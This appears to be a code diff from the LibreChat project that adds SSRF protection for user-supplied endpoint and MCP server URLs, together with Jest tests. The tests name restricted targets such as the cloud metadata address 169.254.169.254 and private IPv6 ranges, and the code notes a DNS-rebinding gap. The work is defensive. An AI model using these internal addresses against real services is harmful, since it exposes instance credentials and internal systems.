await expect(validateEndpointURL('http://[fc00::1]/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for .local TLD hostname', async () => {
await expect(validateEndpointURL('http://myservice.local/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for .internal TLD hostname', async () => {
await expect(validateEndpointURL('http://api.internal/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should pass when DNS lookup fails (fail-open)', async () => {
mockedLookup.mockRejectedValueOnce(new Error('ENOTFOUND'));
await expect(
validateEndpointURL('https://nonexistent.example.com/v1', 'test-ep'),
).resolves.toBeUndefined();
});
it('should throw structured JSON with type invalid_base_url', async () => {
const error = await validateEndpointURL('http://169.254.169.254/latest/', 'my-ep').catch(
(err: Error) => err,
);
expect(error).toBeInstanceOf(Error);
const parsed = JSON.parse((error as Error).message);
expect(parsed.type).toBe('invalid_base_url');
expect(parsed.message).toContain('my-ep');
expect(parsed.message).toContain('targets a restricted address');
});
});

View file

@@ -59,6 +59,20 @@ function isPrivateIPv4(a: number, b: number, c: number): boolean {
return false;
}
/** Checks if a pre-normalized (lowercase, bracket-stripped) IPv6 address falls within fe80::/10 */
function isIPv6LinkLocal(ipv6: string): boolean {
if (!ipv6.includes(':')) {
return false;
}
const firstHextet = ipv6.split(':', 1)[0];
if (!firstHextet || !/^[0-9a-f]{1,4}$/.test(firstHextet)) {
return false;
}
const hextet = parseInt(firstHextet, 16);
// /10 mask (0xffc0) preserves top 10 bits: fe80 = 1111_1110_10xx_xxxx
return (hextet & 0xffc0) === 0xfe80;
}
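The bitwise check above can be sanity-tested in isolation: masking the first hextet with 0xffc0 keeps its top ten bits, and link-local addresses are exactly those whose masked value equals 0xfe80. A standalone sketch of that arithmetic (mirroring, not importing, the helper above):

```typescript
// Standalone sketch of the fe80::/10 membership test: mask the first hextet
// with 0xffc0 (top 10 bits) and compare against 0xfe80 (1111_1110_10xx_xxxx).
function firstHextetIsLinkLocal(hextet: number): boolean {
  return (hextet & 0xffc0) === 0xfe80;
}

// Boundary values: fe80 opens the range, febf closes it; fec0 (start of the
// deprecated site-local range) and fe7f fall outside.
for (const hex of ['fe80', 'fe90', 'febf', 'fec0', 'fe7f']) {
  console.log(hex, firstHextetIsLinkLocal(parseInt(hex, 16)));
}
```

This is why a naive `startsWith('fe80')` misses fe81 through febf: the /10 boundary does not fall on a hextet-string prefix.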
/** Checks if an IPv6 address embeds a private IPv4 via 6to4, NAT64, or Teredo */
function hasPrivateEmbeddedIPv4(ipv6: string): boolean {
if (!ipv6.startsWith('2002:') && !ipv6.startsWith('64:ff9b::') && !ipv6.startsWith('2001::')) {
@@ -132,9 +146,9 @@ export function isPrivateIP(ip: string): boolean {
if (
normalized === '::1' ||
normalized === '::' ||
normalized.startsWith('fc') || // fc00::/7 — exactly prefixes 'fc' and 'fd'
normalized.startsWith('fd') ||
isIPv6LinkLocal(normalized) // fe80::/10 — spans 0xfe80-0xfebf; bitwise check required
) {
return true;
}
@@ -428,7 +442,10 @@ export async function isActionDomainAllowed(
/**
* Extracts full domain spec (protocol://hostname:port) from MCP server config URL.
* Returns the full origin for proper protocol/port matching against allowedDomains.
* @returns The full origin string, or null when:
* - No `url` property, non-string, or empty (stdio transport always allowed upstream)
* - URL string present but cannot be parsed (rejected fail-closed upstream when allowlist active)
* Callers must distinguish these two null cases; see {@link isMCPDomainAllowed}.
* @param config - MCP server configuration (accepts any config with optional url field)
*/
export function extractMCPServerDomain(config: Record<string, unknown>): string | null {
@@ -452,6 +469,11 @@ export function extractMCPServerDomain(config: Record<string, unknown>): string
* Validates MCP server domain against allowedDomains.
* Supports HTTP, HTTPS, WS, and WSS protocols (per MCP specification).
* Stdio transports (no URL) are always allowed.
* Configs with a non-empty URL that cannot be parsed are rejected fail-closed when an
* allowlist is active, preventing template placeholders (e.g. `{{HOST}}`) from bypassing
* domain validation after `processMCPEnv` resolves them at connection time.
* When no allowlist is configured, unparseable URLs fall through to connection-level
* SSRF protection (`createSSRFSafeUndiciConnect`).
* @param config - MCP server configuration with optional url field
* @param allowedDomains - List of allowed domains (with wildcard support)
*/
@@ -460,8 +482,18 @@ export async function isMCPDomainAllowed(
allowedDomains?: string[] | null,
): Promise<boolean> {
const domain = extractMCPServerDomain(config);
const hasAllowlist = Array.isArray(allowedDomains) && allowedDomains.length > 0;
const hasExplicitUrl =
Object.prototype.hasOwnProperty.call(config, 'url') &&
typeof config.url === 'string' &&
config.url.trim().length > 0;
if (!domain && hasExplicitUrl && hasAllowlist) {
return false;
}
// Stdio transports (no URL) are always allowed
if (!domain) {
return true;
}
@@ -469,3 +501,91 @@ export async function isMCPDomainAllowed(
// Use MCP_PROTOCOLS (HTTP/HTTPS/WS/WSS) for MCP server validation
return isDomainAllowedCore(domain, allowedDomains, MCP_PROTOCOLS);
}
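The null-handling contract described in the doc comments above can be condensed into a small decision sketch. Everything here is a simplified stand-in for illustration: `extractOrigin` only approximates `extractMCPServerDomain`, and the `'match'` result marks where the real code defers to `isDomainAllowedCore`:

```typescript
// Simplified sketch of the fail-closed ordering in isMCPDomainAllowed.
// extractOrigin approximates extractMCPServerDomain: null for absent/blank
// URLs (stdio) and for present-but-unparseable URLs such as `{{HOST}}`
// templates that have not been resolved yet.
function extractOrigin(url: unknown): string | null {
  if (typeof url !== 'string' || url.trim().length === 0) return null;
  let parsed: URL;
  try {
    parsed = new URL(url);
  } catch {
    return null;
  }
  // Some runtimes let template placeholders survive URL parsing; treat any
  // hostname outside a plain DNS/IP character set as unparseable here.
  if (!/^[a-z0-9.:[\]-]+$/i.test(parsed.hostname)) return null;
  return parsed.origin;
}

function decide(config: { url?: unknown }, allowedDomains?: string[] | null): boolean | 'match' {
  const domain = extractOrigin(config.url);
  const hasAllowlist = Array.isArray(allowedDomains) && allowedDomains.length > 0;
  const hasExplicitUrl = typeof config.url === 'string' && config.url.trim().length > 0;
  if (!domain && hasExplicitUrl && hasAllowlist) return false; // fail closed
  if (!domain) return true; // stdio transport: always allowed
  return 'match'; // defer to the allowlist matcher (isDomainAllowedCore)
}
```

The ordering matters: the fail-closed branch must run before the stdio branch, otherwise an unparseable-but-present URL would be waved through as if no URL existed.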
/**
* Checks whether an OAuth URL matches any entry in the MCP allowedDomains list,
* honoring protocol and port constraints when specified by the admin.
*
* Mirrors the allowlist-matching logic of {@link isDomainAllowedCore} (hostname,
* protocol, and explicit-port checks) but is synchronous; no DNS resolution is
* needed because the caller is deciding whether to *skip* the subsequent
* SSRF/DNS checks, not replace them.
*
* @remarks `parseDomainSpec` normalizes `www.` prefixes, so both the input URL
* and allowedDomains entries starting with `www.` are matched without that prefix.
*/
export function isOAuthUrlAllowed(url: string, allowedDomains?: string[] | null): boolean {
if (!Array.isArray(allowedDomains) || allowedDomains.length === 0) {
return false;
}
const inputSpec = parseDomainSpec(url);
if (!inputSpec) {
return false;
}
for (const allowedDomain of allowedDomains) {
const allowedSpec = parseDomainSpec(allowedDomain);
if (!allowedSpec) {
continue;
}
if (!hostnameMatches(inputSpec.hostname, allowedSpec)) {
continue;
}
if (allowedSpec.protocol !== null) {
if (inputSpec.protocol === null || inputSpec.protocol !== allowedSpec.protocol) {
continue;
}
}
if (allowedSpec.explicitPort) {
if (!inputSpec.explicitPort || inputSpec.port !== allowedSpec.port) {
continue;
}
}
return true;
}
return false;
}
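Since `parseDomainSpec` and `hostnameMatches` are defined elsewhere in this module, here is a self-contained approximation of the matching rules the tests above exercise. The helpers below are simplified stand-ins (no `www.` normalization, no default-port handling), not the real implementations:

```typescript
// Approximation of isOAuthUrlAllowed's allowlist matching: hostname match
// (with `*.` wildcards that also cover the bare apex), plus protocol and
// explicit-port constraints only when the allowlist entry specifies them.
interface Spec {
  protocol: string | null; // e.g. 'https:' when the entry pins a scheme
  hostname: string; // may start with '*.'
  port: string; // '' when no explicit port
}

function parseSpec(entry: string): Spec | null {
  const hasProtocol = /^[a-z][a-z0-9+.-]*:\/\//i.test(entry);
  try {
    // '*' is not a valid URL host, so substitute a marker label for parsing.
    const u = new URL((hasProtocol ? entry : `http://${entry}`).replace('*.', 'wildcard--.'));
    return {
      protocol: hasProtocol ? u.protocol : null,
      hostname: u.hostname.replace('wildcard--.', '*.'),
      port: u.port,
    };
  } catch {
    return null;
  }
}

function hostMatches(host: string, allowed: string): boolean {
  if (allowed.startsWith('*.')) {
    const base = allowed.slice(2);
    return host === base || host.endsWith('.' + base);
  }
  return host === allowed;
}

function oauthUrlAllowed(url: string, allowedDomains?: string[] | null): boolean {
  if (!Array.isArray(allowedDomains) || allowedDomains.length === 0) return false;
  let input: URL;
  try {
    input = new URL(url);
  } catch {
    return false;
  }
  for (const entry of allowedDomains) {
    const spec = parseSpec(entry);
    if (!spec) continue;
    if (!hostMatches(input.hostname, spec.hostname)) continue;
    if (spec.protocol !== null && input.protocol !== spec.protocol) continue;
    if (spec.port !== '' && input.port !== spec.port) continue;
    return true;
  }
  return false;
}
```

Routing both the input URL and the allowlist entries through `URL` gives case-insensitivity for free, since WHATWG URL parsing lowercases hostnames.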
/** Matches ErrorTypes.INVALID_BASE_URL — string literal avoids build-time dependency on data-provider */
const INVALID_BASE_URL_TYPE = 'invalid_base_url';
function throwInvalidBaseURL(message: string): never {
throw new Error(JSON.stringify({ type: INVALID_BASE_URL_TYPE, message }));
}
/**
* Validates that a user-provided endpoint URL does not target private/internal addresses.
* Throws if the URL is unparseable, uses a non-HTTP(S) scheme, targets a known SSRF hostname,
* or DNS-resolves to a private IP.
*
* @note DNS rebinding: validation performs a single DNS lookup. An adversary controlling
* DNS with TTL=0 could respond with a public IP at validation time and a private IP
* at request time. This is an accepted limitation of point-in-time DNS checks.
* @note Fail-open on DNS errors: a resolution failure here implies a failure at request
* time as well, matching {@link resolveHostnameSSRF} semantics.
*/
export async function validateEndpointURL(url: string, endpoint: string): Promise<void> {
let hostname: string;
let protocol: string;
try {
const parsed = new URL(url);
hostname = parsed.hostname;
protocol = parsed.protocol;
} catch {
throwInvalidBaseURL(`Invalid base URL for ${endpoint}: unable to parse URL.`);
}
if (protocol !== 'http:' && protocol !== 'https:') {
throwInvalidBaseURL(`Invalid base URL for ${endpoint}: only HTTP and HTTPS are permitted.`);
}
if (isSSRFTarget(hostname)) {
throwInvalidBaseURL(`Base URL for ${endpoint} targets a restricted address.`);
}
if (await resolveHostnameSSRF(hostname)) {
throwInvalidBaseURL(`Base URL for ${endpoint} resolves to a restricted address.`);
}
}
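The structured error shape that `throwInvalidBaseURL` produces can be consumed like this; `describeFailure` below is an illustrative caller-side helper, not part of the module:

```typescript
// validateEndpointURL throws Errors whose message is itself a JSON document
// ({ type: 'invalid_base_url', message }), so callers can branch on a
// machine-readable type without string-matching the human-readable text.
function throwInvalidBaseURL(message: string): never {
  throw new Error(JSON.stringify({ type: 'invalid_base_url', message }));
}

// Illustrative caller-side helper: recover the payload, or null for plain errors.
function describeFailure(err: unknown): { type: string; message: string } | null {
  if (!(err instanceof Error)) return null;
  try {
    const parsed = JSON.parse(err.message) as { type?: unknown; message?: unknown };
    return typeof parsed.type === 'string' && typeof parsed.message === 'string'
      ? { type: parsed.type, message: parsed.message }
      : null;
  } catch {
    return null; // message was not structured JSON
  }
}

let info: { type: string; message: string } | null = null;
try {
  throwInvalidBaseURL('Base URL for my-ep targets a restricted address.');
} catch (err) {
  info = describeFailure(err);
}
console.log(info?.type); // → 'invalid_base_url'
```

Encoding the payload in `error.message` keeps the function dependency-free; the string literal matches `ErrorTypes.INVALID_BASE_URL` by convention rather than by import, as the comment above notes.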

View file

@@ -32,14 +32,22 @@ describe('LeaderElection with Redis', () => {
process.setMaxListeners(200);
});
beforeEach(async () => {
if (keyvRedisClient) {
await keyvRedisClient.del(LeaderElection.LEADER_KEY);
}
new LeaderElection().clearRefreshTimer();
});
afterEach(async () => {
try {
await Promise.all(instances.map((instance) => instance.resign()));
} finally {
instances = [];
if (keyvRedisClient) {
await keyvRedisClient.del(LeaderElection.LEADER_KEY);
}
}
}); });
afterAll(async () => {

View file

@@ -0,0 +1,119 @@
import { AuthType } from 'librechat-data-provider';
import type { BaseInitializeParams } from '~/types';
const mockValidateEndpointURL = jest.fn();
jest.mock('~/auth', () => ({
validateEndpointURL: (...args: unknown[]) => mockValidateEndpointURL(...args),
}));
const mockGetOpenAIConfig = jest.fn().mockReturnValue({
llmConfig: { model: 'test-model' },
configOptions: {},
});
jest.mock('~/endpoints/openai/config', () => ({
getOpenAIConfig: (...args: unknown[]) => mockGetOpenAIConfig(...args),
}));
jest.mock('~/endpoints/models', () => ({
fetchModels: jest.fn(),
}));
jest.mock('~/cache', () => ({
standardCache: jest.fn(() => ({ get: jest.fn().mockResolvedValue(null) })),
}));
jest.mock('~/utils', () => ({
isUserProvided: (val: string) => val === 'user_provided',
checkUserKeyExpiry: jest.fn(),
}));
const mockGetCustomEndpointConfig = jest.fn();
jest.mock('~/app/config', () => ({
getCustomEndpointConfig: (...args: unknown[]) => mockGetCustomEndpointConfig(...args),
}));
import { initializeCustom } from './initialize';
function createParams(overrides: {
apiKey?: string;
baseURL?: string;
userBaseURL?: string;
userApiKey?: string;
expiresAt?: string;
}): BaseInitializeParams {
const { apiKey = 'sk-test-key', baseURL = 'https://api.example.com/v1' } = overrides;
mockGetCustomEndpointConfig.mockReturnValue({
apiKey,
baseURL,
models: {},
});
const db = {
getUserKeyValues: jest.fn().mockResolvedValue({
apiKey: overrides.userApiKey ?? 'sk-user-key',
baseURL: overrides.userBaseURL ?? 'https://user-api.example.com/v1',
}),
} as unknown as BaseInitializeParams['db'];
return {
req: {
user: { id: 'user-1' },
body: { key: overrides.expiresAt ?? '2099-01-01' },
config: {},
} as unknown as BaseInitializeParams['req'],
endpoint: 'test-custom',
model_parameters: { model: 'gpt-4' },
db,
};
}
describe('initializeCustom SSRF guard wiring', () => {
beforeEach(() => {
jest.clearAllMocks();
});
it('should call validateEndpointURL when baseURL is user_provided', async () => {
const params = createParams({
apiKey: 'sk-test-key',
baseURL: AuthType.USER_PROVIDED,
userBaseURL: 'https://user-api.example.com/v1',
expiresAt: '2099-01-01',
});
await initializeCustom(params);
expect(mockValidateEndpointURL).toHaveBeenCalledTimes(1);
expect(mockValidateEndpointURL).toHaveBeenCalledWith(
'https://user-api.example.com/v1',
'test-custom',
);
});
it('should NOT call validateEndpointURL when baseURL is system-defined', async () => {
const params = createParams({
apiKey: 'sk-test-key',
baseURL: 'https://api.provider.com/v1',
});
await initializeCustom(params);
expect(mockValidateEndpointURL).not.toHaveBeenCalled();
});
it('should propagate SSRF rejection from validateEndpointURL', async () => {
mockValidateEndpointURL.mockRejectedValueOnce(
new Error('Base URL for test-custom targets a restricted address.'),
);
const params = createParams({
apiKey: 'sk-test-key',
baseURL: AuthType.USER_PROVIDED,
userBaseURL: 'http://169.254.169.254/latest/meta-data/',
expiresAt: '2099-01-01',
});
await expect(initializeCustom(params)).rejects.toThrow('targets a restricted address');
expect(mockGetOpenAIConfig).not.toHaveBeenCalled();
});
});

View file

@@ -9,9 +9,10 @@ import type { TEndpoint } from 'librechat-data-provider';
import type { AppConfig } from '@librechat/data-schemas';
import type { BaseInitializeParams, InitializeResultBase, EndpointTokenConfig } from '~/types';
import { getOpenAIConfig } from '~/endpoints/openai/config';
import { isUserProvided, checkUserKeyExpiry } from '~/utils';
import { getCustomEndpointConfig } from '~/app/config';
import { fetchModels } from '~/endpoints/models';
import { validateEndpointURL } from '~/auth';
import { standardCache } from '~/cache';
const { PROXY } = process.env;
@@ -123,6 +124,10 @@ export async function initializeCustom({
throw new Error(`${endpoint} Base URL not provided.`);
}
if (userProvidesURL) {
await validateEndpointURL(baseURL, endpoint);
}
let endpointTokenConfig: EndpointTokenConfig | undefined;
const userId = req.user?.id ?? '';

View file

@@ -0,0 +1,135 @@
import { AuthType, EModelEndpoint } from 'librechat-data-provider';
import type { BaseInitializeParams } from '~/types';
const mockValidateEndpointURL = jest.fn();
jest.mock('~/auth', () => ({
validateEndpointURL: (...args: unknown[]) => mockValidateEndpointURL(...args),
}));
const mockGetOpenAIConfig = jest.fn().mockReturnValue({
llmConfig: { model: 'gpt-4' },
configOptions: {},
});
jest.mock('./config', () => ({
getOpenAIConfig: (...args: unknown[]) => mockGetOpenAIConfig(...args),
}));
jest.mock('~/utils', () => ({
getAzureCredentials: jest.fn(),
resolveHeaders: jest.fn(() => ({})),
isUserProvided: (val: string) => val === 'user_provided',
checkUserKeyExpiry: jest.fn(),
}));
import { initializeOpenAI } from './initialize';
function createParams(env: Record<string, string | undefined>): BaseInitializeParams {
const savedEnv: Record<string, string | undefined> = {};
for (const key of Object.keys(env)) {
savedEnv[key] = process.env[key];
}
Object.assign(process.env, env);
const db = {
getUserKeyValues: jest.fn().mockResolvedValue({
apiKey: 'sk-user-key',
baseURL: 'https://user-proxy.example.com/v1',
}),
} as unknown as BaseInitializeParams['db'];
const params: BaseInitializeParams = {
req: {
user: { id: 'user-1' },
body: { key: '2099-01-01' },
config: { endpoints: {} },
} as unknown as BaseInitializeParams['req'],
endpoint: EModelEndpoint.openAI,
model_parameters: { model: 'gpt-4' },
db,
};
const restore = () => {
for (const key of Object.keys(env)) {
if (savedEnv[key] === undefined) {
delete process.env[key];
} else {
process.env[key] = savedEnv[key];
}
}
};
return Object.assign(params, { _restore: restore });
}
describe('initializeOpenAI SSRF guard wiring', () => {
afterEach(() => {
jest.clearAllMocks();
});
it('should call validateEndpointURL when OPENAI_REVERSE_PROXY is user_provided', async () => {
const params = createParams({
OPENAI_API_KEY: 'sk-test',
OPENAI_REVERSE_PROXY: AuthType.USER_PROVIDED,
});
try {
await initializeOpenAI(params);
} finally {
(params as unknown as { _restore: () => void })._restore();
}
expect(mockValidateEndpointURL).toHaveBeenCalledTimes(1);
expect(mockValidateEndpointURL).toHaveBeenCalledWith(
'https://user-proxy.example.com/v1',
EModelEndpoint.openAI,
);
});
it('should NOT call validateEndpointURL when OPENAI_REVERSE_PROXY is a system URL', async () => {
const params = createParams({
OPENAI_API_KEY: 'sk-test',
OPENAI_REVERSE_PROXY: 'https://api.openai.com/v1',
});
try {
await initializeOpenAI(params);
} finally {
(params as unknown as { _restore: () => void })._restore();
}
expect(mockValidateEndpointURL).not.toHaveBeenCalled();
});
it('should NOT call validateEndpointURL when baseURL is falsy', async () => {
const params = createParams({
OPENAI_API_KEY: 'sk-test',
});
try {
await initializeOpenAI(params);
} finally {
(params as unknown as { _restore: () => void })._restore();
}
expect(mockValidateEndpointURL).not.toHaveBeenCalled();
});
it('should propagate SSRF rejection from validateEndpointURL', async () => {
mockValidateEndpointURL.mockRejectedValueOnce(
new Error('Base URL for openAI targets a restricted address.'),
);
const params = createParams({
OPENAI_API_KEY: 'sk-test',
OPENAI_REVERSE_PROXY: AuthType.USER_PROVIDED,
});
try {
await expect(initializeOpenAI(params)).rejects.toThrow('targets a restricted address');
} finally {
(params as unknown as { _restore: () => void })._restore();
}
expect(mockGetOpenAIConfig).not.toHaveBeenCalled();
});
});

Some files were not shown because too many files have changed in this diff.